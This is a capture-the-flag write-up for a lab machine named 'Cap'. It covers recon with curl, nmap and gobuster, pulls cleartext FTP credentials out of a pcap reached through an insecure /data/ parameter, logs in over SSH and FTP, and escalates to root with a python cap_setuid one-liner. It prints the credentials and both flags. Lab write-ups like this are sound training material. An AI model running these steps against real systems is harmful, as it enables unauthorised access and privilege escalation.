Cap

TARGET IP: 10.10.10.245
HOST IP: 10.10.16.3
RECON
WEBSITE
http://[TARGET IP]

Looks like a data analytics page that I am currently signed into as
Nathan
.The dropdown menu page under the user doesn't do anything. All of the buttons including the
Logout
don't point towards anything or do anything.Take a look at the source code:
<!-- offset area start -->
<div class="offset-area">
<div class="offset-close"><i class="ti-close"></i></div>
<ul class="nav offset-menu-tab">
<li><a class="active" data-toggle="tab" href="#activity">Activity</a></li>
<li><a data-toggle="tab" href="#settings">Settings</a></li>
</ul>
<div id="activity" class="tab-pane fade in show active">
<div class="recent-activity">
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-check"></i>
</div>
<div class="tm-title">
<h4>Added</h4>
<span class="time"><i class="ti-time"></i>7 Minutes Ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>You missed you Password!</h4>
<span class="time"><i class="ti-time"></i>09:20 Am</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Member waiting for you Attention</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>You Added Kaji Patha few minutes ago</h4>
<span class="time"><i class="ti-time"></i>01 minutes ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Ratul Hamba sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Hello sir , where are you, i am egerly waiting for you.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
</div>
</div>
<div id="settings" class="tab-pane fade">
<div class="offset-settings">
<h4>General Settings</h4>
<div class="settings-list">
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch1" />
<label for="switch1">Toggle</label>
</div>
</div>
<p>Keep it 'On' When you want to get all the notification.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show recent activity</h5>
<div class="s-swtich">
<input type="checkbox" id="switch2" />
<label for="switch2">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show your emails</h5>
<div class="s-swtich">
<input type="checkbox" id="switch3" />
<label for="switch3">Toggle</label>
</div>
</div>
<p>Show email so that easily find you.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show Task statistics</h5>
<div class="s-swtich">
<input type="checkbox" id="switch4" />
<label for="switch4">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch5" />
<label for="switch5">Toggle</label>
</div>
</div>
<p>Use checkboxes when looking for yes or no answers.</p>
</div>
</div>
</div>
</div>
</div>
</div>
There is a lot there but it looks like we have some new information:
We have a user named
Nathan
and possibly other usersRashed
,Kaji Patha
, andRatul Hamba
.
Checking out
curl
doesn't give us the version number of thegunicorn
web server.
curl [TARGET IP] -sI

If we go to the home tab in the upper right and click on
Network Status
, we get some really good info about the machine without actually having to run an NMAP scan.Looks like Ports 21, 22, and 80 are open.

When I try something in the search bar, nothing pops up but a parameter is added to the URL.
http://[TARGET IP]/?search=[SEARCHED WORD]#
I captured a packet with Burpsuite and received the following.

Let's try the
Security Snapshot
button. This appears to grab some packet data over a 5 second period and creates apcap
file to look at.We can also see that the URL shows a
data
parameter that after first use equals 1 and sequentially goes up. Let's set the parameter to0
and see what it spits out. We'll also grab thepcap
file from it.
http://[TARGET IP]/data/0

We can open this
pcap
file in wireshark to take a look at it and see if we can find any good information.

WiresharkScanning through the Wireshark capture, we quickly find FTP credentials for the User
Nathan
.

nathan:Buck3tH4TF0RM3!
We can now log into
nathan
's account, list out the current working directory, and download the user flag.
ftp [TARGET IP]
nathan
Buck3tH4TF0RM3!
ls -la
get user.txt
On our host system we can then look into the text file for the first flag.
cat user.txt
user.txt: 1f896817980ce9dfee4c79c1922c5ae3
WAPPALYZER

The backend Language appears to be Python
Utilizes Gunicorn as a webserver
The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.
NMAP
nmap [Target IP]

nmap -A -Sv -p 21,22,80 [TARGET IP]

sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80

ENUMERATION
GOBUSTER
SUBDOMAIN
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt

None of these are new to me and don't provide any new information.
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt

TARGET ENUMERATION
Now that we have credentials for
nathan
. We can spend some time exploring the target system for possible privilege escalation.I'm going to use the credentials to log in through
SSH
.
ssh nathan@[TARGET IP]
yes
Buck3tH4TF0RM3!

Try checking out what sudo privileges we have.
sudo -l
Buck3tH4TF0RM3!

Unfortunately, we have none so let's go digging around.
I spent some time digging around myself but didn't find anything. I decided to upload a copy of linpeas to the target account and perform some auto enumeration to help out.
I came across something interesting.

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
I can verify the capability functions with the following command. This essentially allows for certain processes to have root privleges. Similar to SUID.
getcap -r / 2>/dev/null

This is great information as having the capabilities for
cap_setuid
set is a particularly vulnerable situation.Hacktricks and GTFOBins both have sections for exploiting this for privilege escalation.
Let's go with the privilege escalation from GTFOBins.
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
And now I have root privileges.
Let's go get the root flag.
cat /root/root.txt
ca9be49e3fbed8b6be99a27bcd9be60f
Last updated